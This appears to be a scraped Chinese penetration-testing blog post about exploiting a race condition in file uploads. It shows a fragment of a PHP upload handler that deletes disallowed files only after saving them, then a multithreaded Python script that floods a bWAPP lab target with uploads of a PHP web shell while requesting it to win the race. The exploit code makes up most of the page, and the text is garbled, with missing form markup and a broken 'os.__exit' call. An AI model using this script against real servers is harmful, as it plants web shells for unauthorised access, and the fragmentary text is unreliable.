竞争上传

 
  

enctype="multipart/form-data">

 



";
     17 
     18        if($_FILES['file']['error']>0){
     19            unlink($newfile);
     20           die("Upload file error: ");
     21        }
     22        $ext = array_pop(explode(".",$_FILES['file']['name']));
     23        if(!in_array($ext,$allowtype)){
     24              unlink($newfile);
     25              die("error:upload the file type is not allowed,delete the file!");
     26         }
     27 ?>
#!/usr/bin/python

import os
import requests
import threading

class RaceUpload(threading.Thread):

	def __init__(self):

		threading.Thread.__init__(self)

		self.url = 'http://192.168.0.112/bWAPP/shell0.php'

		self.uploadUrl = 'http://192.168.0.112/bWAPP/upload_file.php'

	def _get(self):
		
		print('try to call uploaded file...')

		r = requests.get(self.url)

		if r.status_code == 200 :

			print("[*]create file info.php success")

			os.__exit(0)

	def _upload(self):

		print("upload file.....")

		file = {"file":open("/Library/WebServer/Documents/shell0.php","rb"),}

		requests.post(self.uploadUrl,files = file)

	def run(self):

		while True:

			for i in range(5):

				self._get()

			for i in range(10):

				self._upload()

				self._get()


if __name__ == "__main__" :

	threads = 20

	for i in range(threads):

		t = RaceUpload()

		t.start()

	for i in range(threads):

		t.join()


竞争上传_第1张图片

你可能感兴趣的:(渗透测试,web)